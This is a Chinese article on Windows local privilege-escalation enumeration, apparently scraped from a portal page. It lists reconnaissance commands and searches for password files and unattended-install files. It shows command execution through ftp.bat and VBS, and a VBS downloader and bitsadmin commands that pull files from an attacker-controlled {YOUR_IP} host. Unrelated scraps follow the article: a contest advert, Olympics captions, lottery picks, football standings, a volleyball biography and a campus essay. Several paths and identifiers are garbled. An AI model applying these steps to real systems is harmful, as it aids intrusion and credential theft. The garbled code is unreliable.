这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。
1
获取操作系统信息
识别操作系统名称及版本:
C:Usersthel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10Pro
OS Version: 10.0.14393N/A Build 14393
当然中文系统你得这样:
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
识别系统体系结构:
C:Usersthel3l> echo %PROCESSOR_ARCHITECTURE%
AMD64
查看所有环境变量:
C:Usersthel3l> SET
USERNAME=thel3l
USERPROFILE=C:Usersthel3l
*snip*
查看某特定用户信息:
C:Usersthel3l>net user thel3l
User name thel3l
*snip*
The command completed successfully
2
获取网络信息
查看路由表信息:
C:Usersthel3l> route print
查看ARP缓存信息:
C:Usersthel3l> arp -A
查看防火墙规则:
C:Usersthel3l> netstat -ano
C:Usersthel3l> netsh firewall show config
C:Usersthel3l> netsh firewall show state
3
应用程序及服务信息
查看计划任务:
C:Usersthel3l> schtasks /QUERY /fo LIST /v
中文系统的命令,先调整GBK编码为437美国编码:
chcp 437
然后
schtasks /QUERY /fo LIST /v
查看服务进程ID:
C:Usersthel3l> tasklist /SVC
查看安装驱动:
C:Usersthel3l> DRIVERQUERY
查看安装程序和版本信息(漏洞利用线索):
C:Usersthel3l> wmic product list brief
查看服务、进程和启动程序信息:
C:Usersthel3l> wmic service list brief
C:Usersthel3l> wmic process list brief
C:Usersthel3l> wmic startup list brief
查看.msi程序的执行权限:
C:Usersthel3l> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
C:Usersthel3l> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
查看是否设置有setuid和setgid:
C:Usersthel3l>
reg query HKEY_Local_MachineSystemCurrentControlSetServicesNfsSvrParametersSafeSetUidGidBits
查看安装补丁和时间信息:
C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn
查看特定漏洞补丁信息:
C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"
4
敏感数据和目录
查找密码文件或其它敏感文件:
C:Usersthel3l> cd/
C:Usersthel3l> dir /b/s password.txt
C:Usersthel3l> dir /b/s config.*
C:Usersthel3l> findstr /si password *.xml *.ini *.txt
C:Usersthel3l> findstr /si login *.xml *.ini *.txt
无人值守安装文件:
这些文件通常包含模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:
C:sysprep.inf
C:sysprepsysprep.xml
C:WindowsPantherUnattendUnattended.xml
C:WindowsPantherUnattended.xml
5
文件系统
可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下:
import os; os.system("cmd /c {command here}")
使用copy con命令创建ftp执行会话:
范例
C:Usersthel3l> copy con ftp.bat#创建一个名为ftp.bat的批处理文件
ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出
C:Usersthel3l> ftp.bat# 执行创建的文件
ftp> # 执行ftp命令
ftp> !{command}# e.g. - !dir or !ipconfig
使用copy con命令创建VBS脚本文件:
C:Usersthel3l> copy con commandExec.vbs #创建VBS脚本文件
Call W.CreateObject("W.Shell").Run("cmd /K {command}", 8, True) #VBS文件内容
C:Usersthel3l>commandExec.vbs #执行脚本文件
检查文件夹可写状态:
C:Usersthel3l> dir /a-r-d /s /b
6
一个有用的文件上传脚本
' downloadfile.vbs
' Set your settings
strFileURL = "https://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation ="c:{FILE_NAME.EXT}"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("ing.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
该脚本是一个社区发布的,你可以以下这种方式运行它:
C:Usersthel3l>c.exe downloadfile.vbs
bitsadmin命令:
如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程:
范例
C:Usersthel3l> bitsadmin /transfer job_name /download /priority priority URL localpathfile
C:Usersthel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}
C:UsersusernameDownloads{FILE_NAME.EXT}
如:
bitsadmin /transfer n https://download.fb.com/file/xx.zip c:pentestxx.zip
来源:https://www.freebuf.com/articles/system/114731.html
“炼石杯”网络空间安全技能大赛
以赛促学、以技会友
更有诸多大奖等你拿
详情咨询QQ群:478091920
本文仅代表作者观点,不代表百度立场。
本文系作者授权百度百家发表,未经许可,不得转载。
2016年里约奥运会赛程已过半,里约不但有风景迷人的海湾、海滩和郁郁葱葱的热带岛屿让人流连忘返。摄影师还在奥运会的赛场上捕捉到了很多唯美的画面。 里约奥运会开幕式的烟火 里约时间2016年8月5日, 2016届夏季奥运会开幕式在里约热内卢盛大上演,各式各样的烟花成为开幕式上一道靓丽的风景。 自行车女子凯林赛 8月13日,在2016年里约奥运会场地自行车女子凯琳赛的比赛中,选手们在封闭的木质赛道上飞速骑行,从镜头里看俨然是一幅彩绘赛场,画影逐梦的画卷...
【单固】彩民留言 BaoEr 001(026)让负037胜2x1;010胜048负2x1;026负负076胜胜2x1;025(055)负074胜胜2x1;028胜049胜2x1;029胜093(022)胜2x1;011胜胜037胜076胜胜3x1;009胜平011让胜048负3x1;029胜091胜平093胜3x1;004负020负063负3x3。日乙东京绿茵 千叶 名古屋坐客拿分 湘南胜 长崎福冈分胜负,意甲佛罗伦萨胜 罗马胜 拉齐奥 尤文客场取3分 米兰德比分胜负...
1、A组苏格兰强势领跑,西班牙紧随其后B组法国队五连胜稳坐榜首,荷兰紧追不舍C组英格兰排名第一,乌克兰居第二D组克罗地亚少赛一场领先,土耳其队紧随其后E组阿尔巴尼亚意外领跑,捷克居第二F组比利时表现出色,奥地利屈居第二G组匈牙利排名第一,塞尔维亚第二H组斯洛文。 2、丹麦胜主队塞尔维近10场战绩5胜4平1负进18球失8球,表现较好主场塞尔维近10场战绩5胜4平1负进20球失9球,表现较不错客队丹麦近10场战绩4胜3平3负进17球失11球,表现较一般客场丹麦近10场战绩3胜3平...
英超有一支蓝军,和国家队意大利的蓝一样令人仰视,这支球队曾带给球迷无数荣耀时刻,也总是面对诸多的阻力。血性强硬的防守时被称为肌肉群体的绞肉机,讲求地面配合更多通过运动战运筹帷幄的时期,又被认为是学某某队,四不像。哪怕是登顶时刻也被部分人们所不齿,而无缘前四的赛季居然被评为英超球迷最遭恨的球队。 其实作为切尔西和蓝军球迷来说,其他的流言蜚语以及不利传闻是基本过耳不存心的,因为无稽之谈不需要费心,真正的备战新赛季显然更为重要。尤其是在经历了一个低迷的赛季之后,如何齐心助力...
郎平,满族钮祜禄氏。全国“三八红旗手”。1996年获得国际排联颁发的“世界最佳教练"。2002年10月,由知名排球教练、运动员和记者组成的评委会以100%的得票,正式入选排球名人堂,成为亚洲排球运动员中获此殊荣的第一人。郎平与美国名将弗罗拉·海曼、古巴名将米雷亚·路易斯并称为1980年代世界女排“三大主攻手”。2013年4月25日郎平被任命为新一届女排国家队主教练。2015年2月1日,郎平获2014CCTV体坛风云人物最佳教练奖。2015年在女排世界杯最后一场比赛中中...
编者按: 再过几天,又是一年一度的“女生节”了,相信在校的同学们还要搞很多丰富多彩的活动。你可能不知道,有一种说法,女生节起源于山东大学。这可不是我瞎说,有85级学长的回忆文章为证。 本文转载自网名为“胡杨”“的1985级中文系师兄的新浪博客,其间登载了大量生活随笔和回忆录。其中”80年代系列“是胡杨师兄根据自己十几本日记整理出来的,贯穿了自己从中学到大学的青春轨迹。读起来平白质朴但颇有意趣。关于山大生活的回忆,让30年后的我们读起来都颇能引起共鸣和联想。 (特别启...
发表评论